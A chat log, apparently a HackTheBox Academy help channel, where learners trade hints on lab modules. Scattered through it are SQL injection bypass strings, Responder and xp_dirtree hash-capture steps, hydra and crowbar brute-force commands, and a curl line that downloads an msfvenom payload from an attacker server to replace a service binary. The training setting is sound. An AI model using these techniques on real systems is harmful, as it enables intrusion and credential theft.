#modules
nope nothing
ran it several times and added the -D for domain
although im suspecting i should get a user from it at least so I can bruteforce it
Yeah you have the right idea. I don't remember because I did this assessment a while ago, but was there a users list included in the resources of the module? If so, try doing your user enum with that list
thx mate ill try again
no problem, you're on the right track
Sometimes you need to slow your tools down to wait for a response
yup I think that was it cz I got it on a retry
i'm doing this module and i'm running into problems... nmap can't scan the network it literally can't find any hosts on that ip address what is my hosts file supposed to look like? https://academy.hackthebox.com/module/113/section/1088
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.42.195 app.inlanefreight.local
10.129.42.195 dev.inlanefreight.local
10.129.42.195 drupal-dev.inlanefreight.local
10.129.42.195 drupal-qa.inlanefreight.local
10.129.42.195 drupal-acc.inlanefreight.local
10.129.42.195 drupal.inlanefreight.local
10.129.42.195 blog.inlanefreight.local
that's what mine looks like right now but i'm not sure if that's correct
Would anyone be fine giving me a helping hand designing a very very very easy and most basic network diagram based on the most basic of basic equipment requirements it should have
Try using just one IP and the hosts after.
10.129.42.195 vhost vhost vhost etc. etc.
this is what it looks like now ```10.129.42.195 app.inlanefreight.local dev.inlanefreight.local drupal-dev.inlanefreight.local drupal-qa.inlanefreight.local drupal-acc.inlanefreight.local drupal.inlanefreight.local blog.inlanefreight.local```
Hello, could someone help with exercise 1 of the Predictable Reset Tokens - Broken Authentication module?
I can't get the script to return the correct token. I've already read the previous hints on this forum.
@rustic sage Try pinging or 'curl -I' one of the hosts i.e. dev.inlanefreight.local to test
curl: (7) Failed to connect to dev.inlanefreight.local port 80 after 3101 ms: Couldn't connect to server
strange because
i feel so dumb i didn't bother to check the vpn... the thing crashed!!!
ooops
It happens. no worries.
<@&486603600085123073> I'm on Attacking Enterprise Networks. This is triggering when I go to support.inlanefreight.local the rest of the vhosts are normal. Just an FYI.
Are you typing it in right? Because this is redirecting
The URL is in the SS.
I'm working through the footprinting module and trying to answer the question in the SMB enumeration section
The question that I am struggling on is: Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.
not sure if i understand the question
or is it that I will understand the question once I find the answer 😄
Connect and enumerate 🙂
***client > ********enum > Version will be obvious
The wording on that question isn't the greatest...
It's not the version of the server, but the version of a service..
smbclient or rpc might be good for finding it out
enum
i believe it's also case specific
as in Linux is not linux
wowie wow i am officially 50% done with the infosec fundamentals path 😐
well done!!!
keep going 🙂
ok what format is the answer in
it's not a flag i suppose?
Nope
ok so more info than before
i can't wait to get the fuck out of school so i can actually start focusing on this
well rpcclient command netshareenum <sharename> does give more info
i don't get from the question what extra info is being asked for
sorry no
Custom version
i mean netsharegetinfo
I'm sure I..freight isn't an official version
I already submitted the version for that
didn't seem to take
ok i needed to submit the whole thing
Yeah lol
i think supplying the format of the answer might have been useful there
custom version
Attacking Common Services
-> Attacking SQL Databases
im stuck at the first question.
i logged into the given htb credentials with impacket mssqlclient.py
listing all DBs with enum_db
need a little hint from now on
whats the question?
what is the pw for mssqlsvc user
I need help with password attack pass mutation module
after listing the databases make queries on them - avoid default databases
try & find credentials
i have no permissions to read the relevant dbs
||ive read something in the forum about capturing a hash with a fake smb share, i might look into this.||
this is a whole other topic, look at the course you just read and see what it has to say about initial access
Do you know how to list the tables of the databases?
yeah that works just need to find the correct table and database
this also works as well select * from tablename;
Did you try stealing?
Depends if mssql or mysql
yeah true i just thought it was mssql
mssql
But he's gotta be the right user to see the right table
im trying the catching ntlm hash but im not getting an event on responder
Is responder running on the right interface?
tun0
And you're having it do the xp..dirtable //ip/share yeah?
okay, as always.... i redid it and it worked, might have had some syntax error xD
xp_dirtree
Oh yeah been a min
this might be the cause 😒
ah the issue was i did it inside of apostrophe ' cmd '
this was a very interesting section, crazy how harmful it can be, that the DB can access remote shares via SMB
The destination machine does not load, does this happen to anyone else?
Target is Spawning
Thoughts on arch Linux
A few minutes ago I was seeing machines not load either. Logged out and back in and it let me spin one up again.
Hello everyone,
Just to be sure there is no issue on my side. The target stuck on "Target is spawning..." on the Attacking Enterprise Networks module. Is there any potential issue for which I'm maybe not aware please?
refresh the page and try to spawn again
I did it many times even by changing the browser but it didn't work unfortunately
I can spawn it, eu-2
Yes you are right. It's working now. After a reboot. Thank you very much.
getting started
knowledge verification
I am trying to escalate privileges to root with the file /usr/bin/php since it is the only file with which I have all permissions but I cannot modify the content of the file, nor edit the name of php to example.sh
I have tried other methods with other files but I have permission denied
Can someone who has done this module give me a clue please?
Hi All, im in the Analyzing Evil With Sysmon & Event Logs module and am getting into the windows vm's ok. The module requires me to download stuff from the internet but there is no internet access on the vm's.
I've already changed the pwnbox location a few times
how did u solved it? im currently facing the same error
can i still access my modules i finished in the academy even though i cancelled my subscription ?
Yes, all 100% completed modules belong to you
What really that's awesome 😎
pls can someone help me with Password Attacks Lab - Medium. I'm trying to crack for 3 days and 3 nights now and Im getting nowhere. Ive tried. and after trying smb2 it just says. Ive also tried crackmapexec but its not providing any results. I've tried cracking ssh and smb but i dont know what Im doing wrong anymore please someone save me
I havent found any user's credentials or anything I've enumerated and found that ssh and smb is running and i couldnt crack 😭
i tried to install the libsmbclient support module for my hydra so it can support smb2 but it failed and i used pwnbox but it also doesnt have the hydra module installed
i dont remember what i did but there is no smb2 its only smb
did you use crackmapexec to crack?
im pretty sure i used hydra but i dont remember
why is it saying i dont have openssl support let me recheck rn im unwilling
Heh
that idk
I think hydra is wonky I had to load hydra in with certain modules before I could crack smb
ok i will try and load more modules
maybe restart your pwnbox
im using my own vm but i tried pwn box and it was the same thing
restart the machine?
maybe run a nmap scan and see whats open
no its open 445
it might rlly be smb2 it says it in the host script results
yeah it is smb version two but there isnt a command on hydra for smb2
well smb 4.sum sum
Cme works iirc
read your hydra error and it will reveal all you need to know
"target does not support smbv1"
can anybody help me understand why im getting this message
module file upload attacks and section type filters
I'm attempting the Password Attacks module, Pass the Ticket (PtT) from Linux section, "Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory. " question.
|| I managed to impersonate svc_workstations to gain access to \dc01\svc_workstations, but the flag in flag.txt does not look right to me.|| Can anyone tell me what I missed or am doing wrongly?
yoo anyone having issues with Attack Tuning -> SqlMap module, flag5 issue? I've literally got the flag from the output flag5, but its incorrect apparently
@zinc nimbus I used metasploit to crack SMB hydra doesn't always work right for SMB
I just finished this lab like 5 hours ago
should be the home dir in the linux target, not dc
hi everyone! I was wondering if anyone could nudge me on the last question of the skills assesment of the game hacking fundamentals module
i've identified the score in the data structure, but everytime i change it it reverts back to the previous score
i've tried seeing what opcodes write to the value, but it isnt rendering any results
any help would be greatly appreciated 🙂
hi, all. I have to bother you with a noob question: I'm at https://academy.hackthebox.com/module/77/section/726 atm. I try to brute-force bobs smb password with crackmapexec. I crafted the correct prompt but I don't use a wordlist containing the actual password. The hint says 'Bob likes to use weak passwords.' What wordlist should I use? Is the hint pointing to a specific one? Or should the password even be 'guessable' by hand?
for anyone wondering in the future, the hint recommends to rerun multiple times for correct output. Make sure to delete the dump in sqlmap/output as you rerun command. You may get the wrong flag a few times but it should return with the right one eventually.
appreciate the push, got one step closer!
nevermind got it 😄
Re-read the "Shares" section of that page carefully.
omg thank you! another reminder to read everything carefully. ❤️
I think it was the way burp suite saves the request i just manually pasted it to a xxe.req file
with sudo vim xxe.req
the game fundamentals module was really cool! Academy rocks 🙂
well now I don't remember what I wrote
I'd appreciate that mods would've move the message upon deleting the thread :/
@autumn pilot
VM's are messing up lol
Well anyway I'll try to ask again, I have a problem on the skill assessment for file upload module, I successfully uploaded a file and got /etc/passwd content but can't get the flag.txt file, tried to get a reverse shell through msfvenom, it uploads successfully but kills the connection instantly when my nc is listening, hopefully somebody can help a bit
Do you have command execution through your upload?
nop
you need to upload something that gives you command execution
I do upload the reverse.php file crafted with msfvenom the upload successfully work
you sent an xml payload to read /etc/passwd?
you're doing the file upload module?
yes
whether it's with xss or xxe I still could read the /etc/passwd which is a good starting point to me
and it was xxe for me
yeah you're right
but I can do it with xss too tho
so you got it with the xml, you said no at first
oh I read that too fast
mb
I upload the file with an xss payload through a JS function that call for the reverse shell on my server
there could be protections in place to prevent that, so you'll need to find another way
you don't do it via revshell
so it means something is killing the connection when I try to rev shell ?
i'm not sure, i didn't do it that way. i don't think it's intended to get a shell via msfvenom
Is there some kind of shell involved or should I only try to read what's stored on the server ? because if it's the second one I never succeed in reading other file at the same root folder level
theoretically if you have command execution you should be able to get a shell, but if you have command execution to run msfvenom payloads, just read the flag instead
yeah maybe I overthought this but I dug down the rabbit hole because I thought it was interesting to try to go further and learn how it work so I could use it elsewhere later in my career
by using other techniques
ok but you can execute commands right
so just get the flag for the skill assessment
you can practice that other stuff that's fine, but there may be other protections htb has in place to prevent that
that is true
Whats wrong here subverting query logic / sql injection fundamental module
SELECT * FROM logins WHERE username='tom' AND password = 'admin' or '1'='1';
SELECT * FROM logins WHERE (username='admin' or '1'='1') AND (password = 'something' or '1'='1');
SELECT * FROM logins WHERE username=" or '1' = '1' AND password = " or '1' = '1' ;
i tried everything
yeah my bad i should write only tom OR '1'='1'
because the select for part already written
For the Attacking Enterprise Networks module. How do these two internal subnet ranges make sense? The 172.16.9.0-255 IP addresses are part of the 172.16.8.0/23 subnet.
Module: Password Attacks
Subsection: Protected Files
Question: Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
My inquiry: where in the heck is Kiras password
😄
nvm
i think the vm was messing up earlier
Hi guys. Can someone please help me on the attacking SQL databases section of Attacking common Services module?
I have connected to the database as htbdbuser using smqlcmd, and I am trying to force it to authenticate to responder and steal the hashes using the xp_dirtree function but can't get it to work.
Any help? these are my commands, I feel like I am on the right lines, as I don't know how else I would gain the pw.
sudo responder -I tun0
2> GO
link?
nvm bugged session
RedTeam Tips: Orchestrating Chaos, Evading Defense Culture
https://twitter.com/Hadess_security/status/1781264096001761606
when i get this error i took a break and when i tried again it works i am pretty sure its from how burp suite deal with files
however thanks for help bro
Guys does penetration testing job role helps to improve capture the flag skills or do I need to take bug bounty path for CTF skills just confused let me know
@cloud urchin coming back to you I actually don't execute command through XSS payload, I successfully found the upload dir which is nice for what I want to do but can't wrap my head around how to upload a .php file that could successfully execute my commands
though I don't know the way I interpreted your message but XXE vuln allowed me to read the content of the upload and submit web page that allowed me to know what's the upload dir
Can anyone give me a hand with this question?
Password Attacks ---> Windows Credential Hunting
What are the credentials to access the Edge router (Format: username:password, case sensitive).
<@&861185840277487616>
LOL
And when I upload a php command through my xss payload It’s not interpreted compared to js code (tried with alert(document.location) )
DM me if you still need help
Have you investigated all the apps on the desktop?
who is the owner of the website?
Hello guys,
Attacking Common Services - Attacking SMB
When I connect to SMB, I cannot read or download the id_rsa file and when I ssh, I get a permission denied error. What can I do?
which question are you on
What is the password for the username "jason"?
I'm working on the FFUF module skill assessment where I'm supposed to fuzz a page that says You don't have access!. I'm guessing I'm meant to use a regex matcher (-mr) for this.
the command I've been using is ||ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -w academy-htb.subdom.txt:HOST -u http://HOST.academy.htb:49584/FUZZ -recursion -recursion-depth 1 -ic -v -mr "You don't have access" -e .php,.phps,.php7||, which I'm now guessing is too broad, because my problem is that the target machine is up for 90mins and my ffuf scan takes too long; it doesn't even finish the first scan (before recursing). Should I be using a different approach?
did you try bruteforcing his password with the module's provided password list?
I'm waiting for it to finish, but when I typed ssh jason@ip it gave me an authorization error without asking for a password.
don't forget the --local-auth option for non-domain joined computers
no, you use the command when it's a non-domain joined computer.
has nothing to do with brute force
it has to do with the logon method, which is important when you're brute forcing logging into something
im try hydra but not working
yes but I couldn't read or download the id_rsa file so I decided to try ssh
what was in the shared folder
im looking at this i dont think you brute force his pw here
but there's a share you CAN read, is there anything in there that may give jason's pw away?
.
well the hint says this A colleague has shared with us a password list that we can find in the resource. He was able to compile this during his research.
ok i double checked im right
found cred
oky oky thx
Hi All, im in the Analyzing Evil With Sysmon & Event Logs module and am getting into the windows vm's ok. The module requires me to download stuff from the internet but there is no internet access on the vm's. I've already changed the pwnbox location many times. Please help.
what is the module asking you to download
first sysmon then Sysmon configuration file downloaded from https://github.com/SwiftOnSecurity/sysmon-config.
there is no net access though
no matter which country i connect to
i think it might be broken
yes i checked that sysmon already is
and all targets you spawn will have no internet access
it should be easy to find
thank you
search for a sysmon config file (that is what is on the machine)
Hello Guys,
Attacking common service - attacking sql databases,
im connect the sql server but not working my command
Need to select the DB first
I want to list the databases but I don't know what's in them right now.
q1 q2?
there's two parts iirc
Yeah, there's two questions
yes
So are you doing q1 or q2? looks like q1
q1
Right
so you shouldnt need to do any of those commands
i dont understand
Try the commands from the "Capture MSSQL Service Hash" section
I would say if you're running the commands with the IP that is hosting the sql database then you have misunderstood the section and need to go back and reread what it is actually telling you. You need to capture the hash.
Gotta start reminding myself to read the questions fully... Spent days trying to exploit something for sudo rights abuse and turned out they just wanted to know what could be exploited...
In the Password Attack module, hard lab. Did you try to mount .vhd in linux?
I use VM, so i attach in windows 
https://learn.microsoft.com/en-us/windows-server/storage/disk-management/manage-virtual-hard-disks
No connection possible
Today i get the error Timers: ping 10, ping-restart 120 when i try to connect to the academy.
I try different VPN connections nothing works.
Have today any other problems?
On the top of the site are a message box
Exams VPN Scheduled Maintenance eu-academy-exams-2 eu-academy-exams-2 should not be used on 23/4 (10:00-11:00 UTC). Please use eu-academy-exams-1
Are this the reason? (i try different connections and it is the wrong day)
I'm on the amazing module Introduction To Splunk & SPL
"Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
I hear this question is misleading.
I've played around with Range but the existing example in the docs sucks. Any discussion around range for SPL is about setting timeframes. Any help here?
I've used Bin for a 10 min timeframe but I think they want a rolling window
It's possible to mount in linux
Above those lines do you see "initialization sequence completed"?
That's not an error btw
i cant ping the lab
ok
yes, its only like 3 commands to do in linux
Hello, I had a question about the Nessus labs. Am I suppose to install Nessus on my kali box and scan the vm? It tells me to scan another box that it has access to. I am confused on what to actually do. It's not very clear
I can SSH to the box, but I am not sure what to do next.
rdp in, go to the nessus web login, there's already a pre populated scan for the skills assessment
Is it alright for me to host my module notes on my Gitbook? Or is it against HackTheBox Academy's terms of service?
As long as they're not public/revealing content
hello guys im stuck at the last step in web attacks-skill assessment but for some reason the xxe dosent seem to work nor the xxeinjector i'd be glad for any info
Understood. Thanks!
Hi
hey can I view directories with store XSS
Hmmm...?
You can use stored XSS to redirect someone to an exploit that'll let you view everything...lol
I don't have access to that just stored XSS that only I can view im trying find a way do some like cat
Does anyone know why I'm getting this error while using enum4linux to enumerate smb shares using a hosts file. If I do it one (IP) by one, it works.
I mean if the lab is set up to run any script uploaded... You could probably pop a shell.
If we're talking in the wild, you need to wait for a user to execute the payload.
right
I need a nudge for "AD Enumeration & Attacks - Skills Assessment Part II". I was able to get a shell on SQL01. I am not sure how to proceed after that.
hi, can anyone help me wiht Windows Privilege Escalation Skills Assessment - Part II?
im waiting for ages, also tested with google.com but i dont get anything, nor an error
check privs
What tool can help me with that?
Found the command that helped whoami /priv
You said tool... Not command.
There's more arguments needed for subbrute
Thanks...I didn't even know what command/tool I was looking for. Was just so stuck.
hey everyone i'm doing Login Brute Forcing - Skills Assessment
on this question
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
i got the user name and the password for the admin login page but when i login it re-load the page and doesn't login to the page
No worries man. Just saying a lot of us in here become more literal the more we interact with computers.
It's the exact same page?
like got access to the normal login page and then got the first flag and then when i try login to second one because there is a path for the admin page so when i try to login it re-load the page like i'm just re-fresh the page no result
Does the login work?
oh ok but i did use hydra and gave me the username and password but idk why it's not working
Clear your cache.
Are you using the IP, or did you assign it a domain?
Try both domain and IP.
Try a different browser. Try pwnbox.
i did
Reset the box?
i did reset and used pwnbox
Last resort is to use curl or burp to see what it says.
i did it also and nothing works because that was my first idea
Damn... That's weird.
yeah lmao
Maybe use Burp to brute force instead?
same result like i did everything you can think about
I haven't done this module
you can see the community-help
Don't ping me. If I'm actively not helping I'm either busy or don't know enough to assist
Understood.
the name login brute forcing - Skills Assessment
anyone can help me with first question in Windows Privilege Escalation Skills Assessment - Part II?? (Find left behind cleartext credentials for the iamtheadministrator domain admin account.)
/etc/hosts file has the xss.htb.net but i dont get the webpage
Use the hostname instead of the IP address.
\o/
just finished AD enum & attack. kinda rude how they only had PS 1.0 on there lol
ADCS was really fun and really well put together
nice will be excited when I get there
for Johannas password, is 30 hours normal to brute force it?
module: password attacks lab - hard
Nope
Use small lists first, and not against ssh
Attacking Common Services
DNS
what i tried so far and cant get any further
||dig any inlanefreight.htb atIP
here i find the nameserver, which i add into resolvers.txt
ofc is inlanefreight.htb in /etc/hosts
./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt||
The only thing that should be in resolvers.txt is the box you spawn at the bottom of the section along with the question
okay, i thought the ns
in this module, the box you spawn is acting as the nameserver.
okay, so no need to get ns.inlanefreight.htb from dig
i don't think you need to modify /etc/hosts at all, and just use the IP you spawn in resolvers.txt and you should be able to complete it
Yep
okay got the flag, i just hate dns stuff xD
Can someone help me with the Windows Privilege Escalation - Weak Permissions. I keep trying to replace the binary with msfvenom and everytime I try to send it over I keep getting these errors: 10.129.225.128 - - [19/Apr/2024 15:12:48] "GET /service.exe HTTP/1.1" 404 - worked fine in the previous module.
404 error means it can't be found on the web server
I understand that. I don'
check the folder location where you're hosting the server
It's there
make sure your msfvenom payload is in the same directory
make sure the name is correct
Yeah, i've done that, tried moving it into different directories, renamed it etc.
also 10.129.225.128 doesn't look like a HTB vpn IP to me. is that your tun0 IP you're hosting the file on?
Target: 10.129.225.128
there really are only a couple of things that will cause it to 404. it can reach the ip you're giving it, but it can't find the file there. so you either have the wrong ip, wrong file, or the file isn't in the directory you're hosting the http server on.
if it's there it wouldn't be a 404, take a look in your browser
Yeah, its not there. But it's in the directory I am currently staring at in my terminal lol
SecurityService.exe bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 lost+found media mnt opt proc root run sbin service.exe srrstr.dll srv sys tmp usr var vmlinuz vmlinuz.old
what is your tun0 ip?
10.10.15.73
...you placed it in your file root?
and that's the ip you're running the web server on?
Yes
put it somewhere else and start the server there, in tmp maybe
and I have placed it in different directories just to see if I was getting the path wrong
why does your GET command say it's reaching out to 10.129.225.128 if you're hosting it on 10.10.15.73
can I dm someone about zephyr pro lab?
I'm trying to retrieve it from the target.
which is 10.129.225.1285
10.129.225.128*
no, you're trying to download it to the target... aren't you?
10.10.15.73 - - [19/Apr/2024 15:20:09] "GET /service.exe HTTP/1.1" 404 -
why would you want to retrieve your msfvenom payload from the victim machine to your host machine? that doesn't make sense
maybe i'm just confused
curl http://10.10.15.73:8080/service.exe -O "C:\Program Files (x86)\PCProtect\SecurityServie.exe"
That is what Im using on the victim machine^^
from powershell
what's your web server command
python3 -m http.server 8080
and it would probably be better to do what Xre0us suggested and try hosting it out of tmp or something
Ok, I have a dedicated folder for HTB stuff I tried retrieving from first but i'll give her a try
there are other ways as well, scp, smb server, xfreerdp and remmina can both share folders very easily so you can xfer via the gui
It worked!
afaik when launching http.server from python the root directory is where its started from
noice
Thanks guys!
Same module, now everytime I try to start the service to trigger the reverse shell in my listener I get this on the target machine: The service did not respond to the start or control request in a timely fashion.
The section Login Form Attacks should help you. You haven't posted anything you have tried so I can't get any more specific.
Why are you trying to create a revshell?
instead of creating a rev shell, keep it simple and just escalate yourself to admin
Be nice to practice doing so
nothing wrong with that and it should work
oh wow a whole new module appeared
sick
im already stuck behind, there are so many modules xD
Oh that looks like a fun module
probably. looks like you're using low thread count too. if you're bruteforcing RDP i would recommend crowbar, it's faster.
That seems a little slow. 🙂 increase threads if you're using hydra. -t
crowbar go brrr
thats at 64
what protocol are you running it against?
rdp
crowbar would have had it cracked by now
Attacking Common Services
Email
i found a valid user via enumeration
now i try to brute this account via hydra on pop3, imap, smtp with the given pws.list from resources, but got no valid password. Do i need to make a mutated list, even tho it isnt mentioned in this module?
question 2
no, you don't need a mutated list.
oh i think i know what might be the issue
You need the pw list from that module
my format is wrong
username
username@inlanefreight.htb <---- this one
is there one for that module> I used rockyou lol
yes
damn lol
||crowbar -b rdp -u johanna -C ~/Desktop/Password-Attacks/new_mut.list -s 10.129.202.222/32||
is that good?
did you run it? or asking?
running it
hi I need a hint in the right direction. this is for hard lab on footprinting. I enumerated ssh and I see that its an Ubuntu server. I enumerated ssh with SSH ssh-audit.py and my results aren't very meaningful
what am I doing wrong here? do I try other ssh audit stuff?
I did nmap scans already which is how I found ssh is open
but don't have password which is my issue
I also see its aes encrypted so hashcat isn't gonna do it and neither is bruteforce right?
I had an issue with this earlier this week.
sucks that i cant do anything else while its running
Did you do a udp scan on nmap ?
I did not do UDP scan I did a regular scan
to get open ports
thats where the creds are
ok
why not? tmux/screen, or ctrl+z and typing bg, or a second ssh window doesnt work?
why udp scan? I don't understand
aren't udp scans super slow?
do I need to do udp scan on ssh?
i dont want to totally spoil it for you but i will give you this: https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
no i mean in terms of progressing through the module
you get creds from there and then everything makes sense
what did you learn in the module that is UDP?
@ me if you get it. I am going to the store for awhile. bbl
what program do you use for taking notes? i want to switch from my .txt to something more modern UI based
I use notion
Hey guys quick question how do you ssh to a target with the user and pw?
obsidian, there are others like notion, onenote
ssh [user]@host
thx ill have a look into them
A question. Please how can I find the reflective.dll file on the machine?
i'm using obsidian, i find it decent.
Okay I did it how you said, and it keeps saying connection refused for this question. For the Bind shells module
ss?
Anyone help me for injection attack
it still refused the connection for some reason
Are you connected to the HTB network via the VPN?
🤦🏾♂️
I forgot to connect, thank you guys
Happens.

Please how can you find the reflective.dll.x64.dll file on the machine. Im stuck on the part where you are supposed to rename the dll file. Thank you
C:\Tools
i need help in FILE inclusion skill assessment , i have found flag but i can't get the cat output from the flag , ping me
Hi all, working on the "web fuzzing" module's skills assessment and need a sanity check. I've started the machine, configured my hosts file to point 'academy.htb' -> IP ADDRESS. curl -I IPADDRESS:PORT to verify it's up, curl -I academy.htb to verify my hosts file is configured correctly, and grab the host header as well. Question 1 asks me to perform vhost and subdomain enumeration on the target. I perform subdomain enumeration, then vhost enumeration, nothing is popping out at as indicating next steps. Given the above does it look like I'm missing something?
how long should it take, its been going for an hour
a minute or two iirc
you using the correct wordlist?
nvm i found other ways to get that
mut_passwords
i am seeing many people stuck in password modules now a days 🤔
use the one provided by the module
its why we're in training 😄
Thank you, I was overcomplicating it.
nah i solved that modules fast even though i am also noob
didnt work for rdp
||crowbar -b rdp -u johanna -C ~/Desktop/Password-Attacks/password.list -s 10.129.202.222/32 -v||
oops sorry was thinking of a different module, yes use the mut_passwords
over an hour is normal?
no and it should be near the top of the mut list if you did it correctly
i removed the duplicates, the list went from 180k to 90k
does capital or lowercase j matter in her name?
Hello everybody 😄 , can someone help with RDP bruteforce ? On password attacks, i got 3/4 flags, but the RDP one seems to not work , crackmap doesnt have anything , and hydra a lot of false positives ..
Is there a better place to ask this question?
something wrong with your list?
its exactly what i typed and mutated a fresh copy of the given lists
i did the mutation that they gave in the cheatsheet
wc -l mut_password.list should give you 93912
then you did it wrong, go fix it
i did the command from the cheat sheet
The cheatsheet is missing the | sort -u
curse word!
Any updates on rass issues posted bout it last time
?
oh well i dont know how to read
It's OK. It's why you're here 
have fun with the rest of that lab....
Can someone help me in the Pentester Testing module, Footprinting smb section, there is a question that I can't find the answer to.
cant u get this with nmap -sC -sV
I'm doing Module 211, section 2276: SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)
I performed all the steps and the timeframe mentioned in Mar 5, 2023 to now. The question asks me to input the common date when all events were created.
However, the creation date is before Mar 5, 2023 and I've tried creating the dashboard multiple times with different time fields, yet the answer is same. What should I do?
im going to prove it thx
there's a handful of techniques in the reading give them a try and report back
Try enum4linux
Lost my notes so i cant confirm for sure 🙄
I thought I would not have internet and did not use it, but when I said that I tried the enum4linux-ng and I instantly got the one I was missing, thanks.
any other date fields you can go off of like @timestamp?
I tried event.created and event.ingested yet the issue persists. It gives a date which is before Mar 5 2023 and hence the answer isn't accepted.
Just played with the module, seems like something with count() is screwing with the date as it's forcing it to the first day of the week, if you mess around with that it will show the actual date
Ahh okay. Will try. Thanks dude
i have the dumbs, you can just add whatever time field, edit it by clicking on it and changing it from weeks to days... but anyhow you can just use the interface itself without editing anything, the date is right there
0-2 for those keeping count
I've found the exploit but when i run it i get nothing back
which module ?
Attacking common applications
did you find the first answer ?
HTB CADE certification?
did you try to get a revshell
yea, not sure why its not working
Thanks, it worked. Apparently, there's something wrong with Elasticsearch because I had to refresh the Dashboard multiple times to then get the result and it was indeed... dumb
The dates changed multiple times.
well you found the CVE
but the application is it hosted on linux/win ?
windows
I use one from this https://www.revshells.com/
listener is on
that worked but connection died
yes now try to put rev shell payload instead of ping yourself
this just for testing that the vulnerability exists
thanks
even if i base64 encode the payload its not picking up
Hi all
I'm currently on the Hard lab for Password Attacks, I've tried a few things to get past where things are at and I've hit a wall.
Cracked the RDP password for Admin but can't connect via RDP
And the password doesn't work for the file needed, I'll avoid spoilers.
Can anyone give me some guidance on this one?
@high reef I used the base64 payload from this
What error for rdp?
thats what i was using
Doesn't connect at all, I checked the Admin account groups and it should be RDPing in. Perhaps the password from the mutated password list is wrong for the Admin account? But hydra looks to have a correct match
Dm the password
It should work just check the port and the ip
it was delayed
thanks for your help
No that's not correct. I'd double check your steps for cracking and possibly your mut_password list, should be about 93000 lines long
hmmm i'll try it again, thanks gubarz
@shut quest I get 94044 from wc -l
That's correct
for the web attacks Bypassing Encoded References, what other method would have been easier to do to accomplish that section bc i made a whole python script then used curl to download all of the pdfs
still the problem i did everything it even gave me new user name and password and i tried them and nothing works
on this question:
Login Brute Forcing - Skills Assessment
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
i tried curl and nothing
What steps in the section I mentioned did you try?
service scanning... the hint is 'bob has a weak password'.. i tried spraying smb and telnet, i see tomcat am i meant to be exploiting this for a shell or am i overlooking something super simple..
Just reading the question, my assumption is that you should be connecting to one of the SMB shares. Have you tried using his name as the password?
yes but not uppercase hold on.............
nah still cant get in.. tried Bob, bob, Bob!, bob1 etc
using GS-SVCSCAN/bob
do these labs still have account lockouts? should i try reset
Injection Attacks: Skills Assessment
I've found the PDF Generation vulnerability and am looking to read the source code of the internal site. Can anyone send me a message to help with that?
WHITEBOX ATTACKS - Privilege Escalation
I feel like a newb having to come out and ask for help on the first question, but I inserted the payload they provided, got the 400 error and tried to visit /admin, but I still get redirected. Am I missing something here?
I am confused about the module "Windows Privilege Escalation" - "Initial Enumeration"
The answer to the question "What non-default privilege does the htb-student user have?" isn't what I expected. The state of the privilege shows as ||"Disabled"||. So why is the answer that?
The privilege is not commonly used and can be used to be exploited.
No most services do not have a lockout set. To expedite your question you might want to turn to the Internet and find a list of weak passwords. No need to thank me, you're welcome that's the 1 hint I'll give you. Best of luck
hello guys, newb here... I just enrolled for the SIlver plan, and want to unlock the Getting Started module or any module, but I press UNLOCK and nothing happens, sorry if this is not the place to ask this questions... thanks for your help
Someone else was having issues with that the other day, I'm not sure what the resolve was. Try logging out and back in? Else try reaching out to support.
ok thx
idk bro i slapped through darkweb 1000 and nothing, i just googled that and did worst passwords2022 list and still nothing xd
I already said you're welcome I cannot help you any further with your search.
Sorry, was the AD BLOCKER, I'm still very redacted... LMAO
Re-read the shares section of the page you're in carefully.
Can someone help me or give me a hint on this question: 'find through SPL searches against all data the process that started the infection. Answer format: _.ex '”
think like an attacker. then trace to the origin
No way, I swear that wasn't there before.
lmao thanks, i cant believe its on the page, how the shit didnt i find this with 2020 and 2023 200 most common, and darknet 10k 😒 wtf
hm it actually is in 2023-200_most_used_passwords.txt
fml in crackmapexec i forgot to put domain/user
thank god i wont make that mistake again.. id probably cry if i did that in the exam
Lol.. Yeah I certainly missed it myself when I went over it
thanks for making me feel a bit better at least 🤣
I even did a search on the academy and it didn't return for that module
Haha yeah I ran through a few lists as well.
Network Enumeration with Nmap - Host and Port Scanning
is there ever any practical reason we would want to disable ICMP echo requests or ARP pings with -Pn or --disable-arp-ping, or is it just used in this module to illustrate the different scan types?
They're commonly filtered out to block those packets
ah ok, so if nmap doesn't receive replies to those packets, it labels those ports as filtered right?
by memory if nmap cannot determine whether its open or closed it can return filtered
if its firewall blocked it should say filtered
you can use the --reason to get results on the ports
I may be wrong but that's by memory
ok thank you!
👍
has pawnbox acting up today for anyone? it stop/terminates itself after ~10 minutes and then have to respawn it again
Hi all
on attacking common services sql portion. i cant sudo apt install sqsh or run mssql-cli because of its numerous errors.
mssql
fixed import lines where it has called a deprecated library from 3.9, but another error from a function popped up. i tried to download python3.9, but apt can't find it. mssql-cli should be a lost cause, and it's a bigger problem that i somehow can't install python3.9(i can install other packages)
ah i forgot pwnbox existed
I need some help
What is it about?
Could someone give me some help with Information Gathering - Web Edition First question of the virtual host section?
Enumerate the target and find a vHost that contains flag No. 1. Submit the flag value as your answer (in the format HTB{DATA}).
I'm doing ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://10.129.226.112 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918
but i'm not getting any hits. What am I doing wrong? Thanks in advance
I've also tried FUZZ.www.inlanefreight.htb as well
hi guys!
seeking some help with server-side attacks skills assessment.
||i have found the url from a javascript file. when i try visit the url. it just displays "are you sure?" and nothing else. ||
is there anything else i'm missing to get the flag?
Edit: I'm blind. lol
the -u flag should be the hostname (aka www.inlanefreight.htb) not the IP.
